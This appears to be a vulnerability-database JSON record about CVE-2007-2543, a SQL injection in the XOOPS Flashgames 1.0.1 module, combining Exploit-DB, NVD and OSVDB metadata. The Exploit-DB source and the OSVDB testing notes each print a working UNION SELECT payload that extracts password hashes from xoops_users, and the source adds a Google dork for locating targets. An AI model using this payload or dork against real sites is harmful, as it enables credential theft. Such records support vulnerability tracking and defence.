{"id": "EDB-ID:3849", "type": "exploitdb", "bulletinFamily": "exploit", "title": "XOOPS Flashgames Module 1.0.1 - Remote SQL Injection Vulnerability", "description": "XOOPS Flashgames Module 1.0.1 Remote SQL Injection Vulnerability. CVE-2007-2543. Webapps exploit for php platform", "published": "2007-05-04T00:00:00", "modified": "2007-05-04T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/3849/", "reporter": "Mehmet Ince", "references": [], "cvelist": ["CVE-2007-2543"], "lastseen": "2016-01-31T19:27:03", "viewCount": 5, "enchantments": {"score": {"value": 7.4, "vector": "NONE", "modified": "2016-01-31T19:27:03", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-2543"]}, {"type": "osvdb", "idList": ["OSVDB:34472"]}], "modified": "2016-01-31T19:27:03", "rev": 2}, "vulnersScore": 7.4}, "sourceHref": "https://www.exploit-db.com/download/3849/", "sourceData": "================================================================\n\nXoops Flashgames Module 1.0.1 Remote Blind SQL Injection\n\n================================================================\n\nBulan: Cyber-security.org\n\n================================================================\n\nExploit:\n/modules/flashgames/game.php?lid=-19/**/UNION/**/SELECT/**/0,1,pass,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/**/FROM/**/xoops_users/**/LIMIT/**/1,1/*\n\n================================================================\n\nGoogle dork: inurl:modules/flashgames/\n\n================================================================\n\n# milw0rm.com [2007-05-04]\n", "osvdbidlist": ["34472"]}

{"cve": [{"lastseen": "2020-10-03T11:45:51", "description": "SQL injection vulnerability in game.php in the Flashgames 1.0.1 module for XOOPS allows remote attackers to execute arbitrary SQL commands via the lid parameter.", "edition": 3, "cvss3": {}, "published": "2007-05-09T01:19:00", "title": "CVE-2007-2543", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-2543"], "modified": "2017-10-11T01:32:00", "cpe": ["cpe:/a:xoops:flashgames_module:1.0.1"], "id": "CVE-2007-2543", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-2543", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:xoops:flashgames_module:1.0.1:*:*:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:20:30", "bulletinFamily": "software", "cvelist": ["CVE-2007-2543"], "description": "## Manual Testing Notes\n/modules/flashgames/game.php?lid=-19/**/UNION/**/SELECT/**/0,1,pass,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/**/FROM/**/xoops_users/**/LIMIT/**/1,1/*\n## References:\n[Secunia Advisory ID:25155](https://secuniaresearch.flexerasoftware.com/advisories/25155/)\nOther Advisory URL: http://milw0rm.com/exploits/3849\nISS X-Force ID: 34076\nFrSIRT Advisory: ADV-2007-1668\n[CVE-2007-2543](https://vulners.com/cve/CVE-2007-2543)\nBugtraq ID: 23820\n", "edition": 1, "modified": "2007-05-04T08:03:23", "published": "2007-05-04T08:03:23", "href": "https://vulners.com/osvdb/OSVDB:34472", "id": "OSVDB:34472", "title": "Flashgames Module for XOOPS game.php lid Variable SQL Injection", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}